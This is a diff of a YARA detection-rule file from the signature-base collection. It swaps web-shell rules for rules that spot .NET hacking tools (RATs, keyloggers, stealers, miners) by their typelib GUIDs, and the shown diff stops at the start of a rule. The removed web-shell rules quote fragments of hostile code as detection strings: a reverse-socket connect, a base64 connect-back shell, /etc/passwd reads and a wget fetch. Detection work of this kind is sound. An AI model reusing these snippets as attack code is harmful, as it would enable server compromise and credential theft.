+		reference = "https://github.com/Soledge/BlockEtw"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3788-L3801"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8bf11041a16060fa32431adfe33727863355bae7fec2cf841dcc919092db5c80"
-		score = 70
+		logic_hash = "8953751277594d4075907e8371764d02307209a732bb05d7cfec8141e23c7765"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "1b5102bdc41a7bc439eea8f0010310a5"
-		hash1 = "f8a6d5306fb37414c5c772315a27832f"
-		hash2 = "37cb1db26b1b0161a4bf678a6b4565bd"
 
 	strings:
-		$s1 = "if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== fals"
-		$s9 = "if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {" fullword
+		$typelibguid0lo = "daedf7b3-8262-4892-adc4-425dd5f85bca" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_404_Data_In_Jfolder_Jfolder01_Xxx
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpwifigrabber : FILE
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2622-L2644"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "1a457672-743c-56f0-a4d7-6c25f9ce2345"
+		date = "2020-12-29"
+		modified = "2025-08-15"
+		reference = "https://github.com/r3nhat/SharpWifiGrabber"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3803-L3816"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "171b811c1b93f99f3070692a91a0462f80d9d52ecf26d7fb7297a8bdd9a4c014"
-		score = 70
+		logic_hash = "6984510cbc43987fee53e5b164d973f56ecdd682d9263dc7cf560ab8728769d9"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "7066f4469c3ec20f4890535b5f299122"
-		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
-		hash2 = "793b3d0a740dbf355df3e6f68b8217a4"
-		hash3 = "8979594423b68489024447474d113894"
-		hash4 = "ec482fc969d182e5440521c913bab9bd"
-		hash5 = "f98d2b33cd777e160d1489afed96de39"
-		hash6 = "4b4c12b3002fad88ca6346a873855209"
-		hash7 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
-		hash8 = "e9a5280f77537e23da2545306f6a19ad"
 
 	strings:
-		$s4 = "&nbsp;<TEXTAREA NAME=\"cqq\" ROWS=\"20\" COLS=\"100%\"><%=sbCmd.toString()%></TE"
+		$typelibguid0lo = "c0997698-2b73-4982-b25b-d0578d1323c2" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Reverse_Jsp_Reverse_Jspbd
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpmapexec : FILE
 {
 	meta:
-		description = "Web Shell - from files jsp-reverse.jsp, jsp-reverse.jsp, jspbd.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2645-L2663"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b4922734-a486-5c4d-9bd7-5146cfecbf01"
+		date = "2020-12-29"
+		modified = "2025-08-15"
+		reference = "https://github.com/cube0x0/SharpMapExec"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3818-L3831"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cd7409bb6ace3044f3d0bf380133c4fe4a7c0c0309f9d800b397439aa95f81fc"
-		score = 50
+		logic_hash = "cc155390b8c739b7c96f45b79a8a078128528d6c7d070161d67484880c51a714"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "8b0e6779f25a17f0ffb3df14122ba594"
-		hash1 = "ea87f0c1f0535610becadf5a98aca2fc"
-		hash2 = "7d5e9732766cf5b8edca9b7ae2b6028f"
 
 	strings:
-		$s0 = "osw = new BufferedWriter(new OutputStreamWriter(os));" fullword
-		$s7 = "sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());" fullword
-		$s9 = "isr = new BufferedReader(new InputStreamReader(is));" fullword
+		$typelibguid0lo = "bd5220f7-e1fb-41d2-91ec-e4c50c6e9b9f" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_400_In_Jfolder_Jfolder01_Jsp_Leo_Warn_Webshell_Nc
+rule SIGNATURE_BASE_HKTL_NET_GUID_K8Fly : FILE
 {
 	meta:
-		description = "Web Shell - from files 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp, webshell-nc.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2664-L2688"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3421e6fb-df65-5e2e-ae46-37f9c763c6a1"
+		date = "2020-12-29"
+		modified = "2025-08-15"
+		reference = "https://github.com/zzwlpx/k8fly"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3833-L3846"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "74e31e51f2cb46a042e8591ffb44fe68fb591d202c8171c6afb556eddb381f6f"
-		score = 70
+		logic_hash = "99fb07cefac5572180f5f66e9ebce39b8d17c3a2acc56dd8fea426452127be5a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "36331f2c81bad763528d0ae00edf55be"
-		hash1 = "793b3d0a740dbf355df3e6f68b8217a4"
-		hash2 = "8979594423b68489024447474d113894"
-		hash3 = "ec482fc969d182e5440521c913bab9bd"
-		hash4 = "f98d2b33cd777e160d1489afed96de39"
-		hash5 = "4b4c12b3002fad88ca6346a873855209"
-		hash6 = "e9a5280f77537e23da2545306f6a19ad"
-		hash7 = "598eef7544935cf2139d1eada4375bb5"
 
 	strings:
-		$s0 = "sbFolder.append(\"<tr><td >&nbsp;</td><td>\");" fullword
-		$s1 = "return filesize / intDivisor + \".\" + strAfterComma + \" \" + strUnit;" fullword
-		$s5 = "FileInfo fi = (FileInfo) ht.get(\"cqqUploadFile\");" fullword
-		$s6 = "<input type=\"hidden\" name=\"cmd\" value=\"<%=strCmd%>\">" fullword
+		$typelibguid0lo = "13b6c843-f3d4-4585-b4f3-e2672a47931e" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_2_520_Job_Jspwebshell_1_2_Ma1_Ma4_2
+rule SIGNATURE_BASE_HKTL_NET_GUID_Stealer : FILE
 {
 	meta:
-		description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, JspWebshell 1.2.jsp, ma1.jsp, ma4.jsp, 2.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2689-L2711"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c721a0ac-e898-52aa-9bdf-a19bc0bd783d"
+		date = "2020-12-29"
+		modified = "2025-08-15"
+		reference = "https://github.com/malwares/Stealer"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3848-L3863"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "49614b2a42210fa134f85fa52c66e12809f2bb9eaf56c17b69d21e5fbfc8888b"
-		score = 70
+		logic_hash = "37f829449b4f8a9524400d9409b985fab2ff70024a88fdd96ba391956a3398e3"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "64a3bf9142b045b9062b204db39d4d57"
-		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
-		hash2 = "56c005690da2558690c4aa305a31ad37"
-		hash3 = "70a0ee2624e5bbe5525ccadc467519f6"
-		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
-		hash5 = "6e0fa491d620d4af4b67bae9162844ae"
-		hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
 
 	strings:
-		$s1 = "while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {" fullword
-		$s6 = "password = (String)session.getAttribute(\"password\");" fullword
-		$s7 = "insReader = new InputStreamReader(proc.getInputStream(), Charset.forName(\"GB231"
+		$typelibguid0lo = "8fcd4931-91a2-4e18-849b-70de34ab75df" ascii wide
+		$typelibguid1lo = "e48811ca-8af8-4e73-85dd-2045b9cca73a" ascii wide
+		$typelibguid2lo = "d3d8a1cc-e123-4905-b3de-374749122fcf" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Shell_2008_2009Mssql_Phpspy_2005_Full_Phpspy_2006_Arabicspy_Hkrkoz
+rule SIGNATURE_BASE_HKTL_NET_GUID_Porttran : FILE
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2712-L2736"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "844e58a2-54f5-51e8-8176-6a478a136603"
+		date = "2020-12-29"
+		modified = "2025-08-15"
+		reference = "https://github.com/k8gege/PortTran"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3865-L3879"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "140af92ab61059649a872bef96b916f2c402fd9891301d4a1ba1f389a45af003"
-		score = 60
+		logic_hash = "f8417a677e88bd923236855d6734cbf3db864c7e3ea60a1e500554fc5946f76a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "791708057d8b429d91357d38edf43cc0"
-		hash1 = "3e4ba470d4c38765e4b16ed930facf2c"
-		hash2 = "aa17b71bb93c6789911bd1c9df834ff9"
-		hash3 = "b68bfafc6059fd26732fa07fb6f7f640"
-		hash4 = "40a1f840111996ff7200d18968e42cfe"
-		hash5 = "e0202adff532b28ef1ba206cf95962f2"
-		hash6 = "802f5cae46d394b297482fd0c27cb2fc"
 
 	strings:
-		$s0 = "$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";" fullword
-		$s5 = "while(list($kname, $columns) = @each($index)) {" fullword
-		$s6 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\";" fullword
-		$s9 = "$tabledump .= \"   PRIMARY KEY ($colnames)\";" fullword
-		$fn = "filename: backup"
+		$typelibguid0lo = "3a074374-77e8-4312-8746-37f3cb00e82c" ascii wide
+		$typelibguid1lo = "67a73bac-f59d-4227-9220-e20a2ef42782" ascii wide
 
 	condition:
-		2 of ( $s* ) and not $fn
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Gfs_Sh_R57Shell_R57Shell127_Sniper_SA_Xxx
+rule SIGNATURE_BASE_HKTL_NET_GUID_Gray_Keylogger_2 : FILE
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2737-L2762"
+		description = "Detects VB.NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "40ab8103-9151-5a5c-8b70-ab3bfd3896f9"
+		date = "2020-12-30"
+		modified = "2025-08-15"
+		reference = "https://github.com/graysuit/gray-keylogger-2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3882-L3896"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "24d93f9ae5e174873a32abdf8dca6c00f03cbb4c5e2ad531ac7fa34f8fc90794"
-		score = 70
+		logic_hash = "92ab6b703064beeab4ef6811732ee76d187958bf4b16f70fa062a7a71ecfb289"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "a2516ac6ee41a7cf931cbaef1134a9e4"
-		hash1 = "ef43fef943e9df90ddb6257950b3538f"
-		hash2 = "ae025c886fbe7f9ed159f49593674832"
-		hash3 = "911195a9b7c010f61b66439d9048f400"
-		hash4 = "697dae78c040150daff7db751fc0c03c"
-		hash5 = "513b7be8bd0595c377283a7c87b44b2e"
-		hash6 = "1d912c55b96e2efe8ca873d6040e3b30"
-		hash7 = "e5b2131dd1db0dbdb43b53c5ce99016a"
-		hash8 = "4108f28a9792b50d95f95b9e5314fa1e"
-		hash9 = "41af6fd253648885c7ad2ed524e0692d"
-		hash10 = "6fcc283470465eed4870bcc3e2d7f14d"
 
 	strings:
-		$s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI"
-		$s11 = "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KIC"
+		$typelibguid0lo = "e94ca3ff-c0e5-4d1a-ad5e-f6ebbe365067" ascii wide
+		$typelibguid1lo = "1ed07564-b411-4626-88e5-e1cd8ecd860a" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Itsec_Phpjackal_Itsecteam_Shell_Jhn
+rule SIGNATURE_BASE_HKTL_NET_GUID_Lime_Miner : FILE
 {
 	meta:
-		description = "Web Shell - from files itsec.php, PHPJackal.php, itsecteam_shell.php, jHn.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2763-L2782"
+		description = "Detects VB.NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d0631817-10a2-55bf-a41d-226fa0dcb9f9"
+		date = "2020-12-30"
+		modified = "2025-08-15"
+		reference = "https://github.com/NYAN-x-CAT/Lime-Miner"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3898-L3911"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0c97731c28f59a6fbab2b7882fae171da8d71add73ec92ab6093dec57fcd7207"
-		score = 70
+		logic_hash = "4b7f810efd907477736f40b9537d1ad99896e28c89bd571244256c385c387bfa"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "8ae9d2b50dc382f0571cd7492f079836"
-		hash1 = "e2830d3286001d1455479849aacbbb38"
-		hash2 = "bd6d3b2763c705a01cc2b3f105a25fa4"
-		hash3 = "40c6ecf77253e805ace85f119fe1cebb"
 
 	strings:
-		$s0 = "$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");" fullword
-		$s6 = "while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|"
-		$s9 = "while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+"
+		$typelibguid0lo = "13958fb9-dfc1-4e2c-8a8d-a5e68abdbc66" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Shell_Ci_Biz_Was_Here_C100_V_Xxx
+rule SIGNATURE_BASE_HKTL_NET_GUID_Blacknet : FILE
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2783-L2803"
+		description = "Detects VB.NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9fbb3c11-7b11-5910-9c8b-247aeefbaa87"
+		date = "2020-12-30"
+		modified = "2025-08-15"
+		reference = "https://github.com/BlackHacker511/BlackNET"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3913-L3929"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a7841dec442877648a589045849f7f1b80316a30dda5a44ccc4bb626dbd2cdea"
-		score = 70
+		logic_hash = "5e3c6e6e50888c942d541ad893b34c65f784614de7576e9a752822c433753d55"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "f2fa878de03732fbf5c86d656467ff50"
-		hash1 = "27786d1e0b1046a1a7f67ee41c64bf4c"
-		hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"
 
 	strings:
-		$s2 = "if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"Error: \".$stri"
-		$s3 = "<OPTION VALUE=\"find /etc/ -type f -perm -o+w 2> /dev/null\""
-		$s4 = "<OPTION VALUE=\"cat /proc/version /proc/cpuinfo\">CPUINFO" fullword
-		$s7 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/de"
-		$s9 = "<OPTION VALUE=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">USER"
+		$typelibguid0lo = "c2b90883-abee-4cfa-af66-dfd93ec617a5" ascii wide
+		$typelibguid1lo = "8bb6f5b4-e7c7-4554-afd1-48f368774837" ascii wide
+		$typelibguid2lo = "983ae28c-91c3-4072-8cdf-698b2ff7a967" ascii wide
+		$typelibguid3lo = "9ac18cdc-3711-4719-9cfb-5b5f2d51fd5a" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_NIX_REMOTE_WEB_SHELL_NIX_REMOTE_WEB_Xxx1
+rule SIGNATURE_BASE_HKTL_NET_GUID_Plasmarat : FILE
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2804-L2823"
+		description = "Detects VB.NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "13362cba-f9b2-50c8-95cc-504e585bdd42"
+		date = "2020-12-30"
+		modified = "2025-08-15"
+		reference = "https://github.com/mwsrc/PlasmaRAT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3931-L3945"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "95d25e9dc75a9af91e23b8c53acb384616f5d8a78605200bdb94f016a7f160f6"
-		score = 70
+		logic_hash = "78d0da86cdef86b06fca37fb378297df26ca792ab6069e87c19c7b075687b07d"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "0b19e9de790cd2f4325f8c24b22af540"
-		hash1 = "f3ca29b7999643507081caab926e2e74"
-		hash2 = "527cf81f9272919bf872007e21c4bdda"
 
 	strings:
-		$s1 = "<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type="
-		$s2 = "$uploadfile = $_POST['path'].$_FILES['file']['name'];" fullword
-		$s6 = "elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}" fullword
-		$s7 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}" fullword
+		$typelibguid0lo = "b8a2147c-074c-46e1-bb99-c8431a6546ce" ascii wide
+		$typelibguid1lo = "0fcfde33-213f-4fb6-ac15-efb20393d4f3" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_C99_C99Shell_C99_W4Cking_Shell_Xxx
+rule SIGNATURE_BASE_HKTL_NET_GUID_Lime_RAT : FILE
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2824-L2852"
+		description = "Detects VB.NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "31a0e9ca-9da1-557a-bcc5-1351fa90a0e1"
+		date = "2020-12-30"
+		modified = "2025-08-15"
+		reference = "https://github.com/NYAN-x-CAT/Lime-RAT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3947-L3980"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "731bbf06208d20874c1d8464472e6a66a2e9b0bc2dc0475783763b99eb70fefa"
-		score = 70
-		quality = 85
-		tags = ""
+		logic_hash = "eee41a29dc6b336c14abedaad767b8a0a529917bbc9096829114f302ed93f53c"
+		score = 75
+		quality = 83
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
-		hash1 = "d3f38a6dc54a73d304932d9227a739ec"
-		hash2 = "9c34adbc8fd8d908cbb341734830f971"
-		hash3 = "f2fa878de03732fbf5c86d656467ff50"
-		hash4 = "b8f261a3cdf23398d573aaf55eaf63b5"
-		hash5 = "27786d1e0b1046a1a7f67ee41c64bf4c"
-		hash6 = "0f5b9238d281bc6ac13406bb24ac2a5b"
-		hash7 = "68c0629d08b1664f5bcce7d7f5f71d22"
-		hash8 = "157b4ac3c7ba3a36e546e81e9279eab5"
-		hash9 = "048ccc01b873b40d57ce25a4c56ea717"
 
 	strings:
-		$s0 = "echo \"<b>HEXDUMP:</b><nobr>"
-		$s4 = "if ($filestealth) {$stat = stat($d.$f);}" fullword
-		$s5 = "while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo \"<tr><td>\".$r"
-		$s6 = "if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"DB "
-		$s8 = "echo \"<center><b>Server-status variables:</b><br><br>\";" fullword
-		$s9 = "echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>"
+		$typelibguid0lo = "e58ac447-ab07-402a-9c96-95e284a76a8d" ascii wide
+		$typelibguid1lo = "8fb35dab-73cd-4163-8868-c4dbcbdf0c17" ascii wide
+		$typelibguid2lo = "37845f5b-35fe-4dce-bbec-2d07c7904fb0" ascii wide
+		$typelibguid3lo = "83c453cf-0d29-4690-b9dc-567f20e63894" ascii wide
+		$typelibguid4lo = "8b1f0a69-a930-42e3-9c13-7de0d04a4add" ascii wide
+		$typelibguid5lo = "eaaeccf6-75d2-4616-b045-36eea09c8b28" ascii wide
+		$typelibguid6lo = "5b2ec674-0aa4-4209-94df-b6c995ad59c4" ascii wide
+		$typelibguid7lo = "e2cc7158-aee6-4463-95bf-fb5295e9e37a" ascii wide
+		$typelibguid8lo = "d04ecf62-6da9-4308-804a-e789baa5cc38" ascii wide
+		$typelibguid9lo = "8026261f-ac68-4ccf-97b2-3b55b7d6684d" ascii wide
+		$typelibguid10lo = "212cdfac-51f1-4045-a5c0-6e638f89fce0" ascii wide
+		$typelibguid11lo = "c1b608bb-7aed-488d-aa3b-0c96625d26c0" ascii wide
+		$typelibguid12lo = "4c84e7ec-f197-4321-8862-d5d18783e2fe" ascii wide
+		$typelibguid13lo = "3fc17adb-67d4-4a8d-8770-ecfd815f73ee" ascii wide
+		$typelibguid14lo = "f1ab854b-6282-4bdf-8b8b-f2911a008948" ascii wide
+		$typelibguid15lo = "aef6547e-3822-4f96-9708-bcf008129b2b" ascii wide
+		$typelibguid16lo = "a336f517-bca9-465f-8ff8-2756cfd0cad9" ascii wide
+		$typelibguid17lo = "5de018bd-941d-4a5d-bed5-fbdd111aba76" ascii wide
+		$typelibguid18lo = "bbfac1f9-cd4f-4c44-af94-1130168494d0" ascii wide
+		$typelibguid19lo = "1c79cea1-ebf3-494c-90a8-51691df41b86" ascii wide
+		$typelibguid20lo = "927104e1-aa17-4167-817c-7673fe26d46e" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_2008_2009Mssql_Phpspy_2005_Full_Phpspy_2006_Arabicspy_Hkrkoz
+rule SIGNATURE_BASE_HKTL_NET_GUID_Njrat : FILE
 {
 	meta:
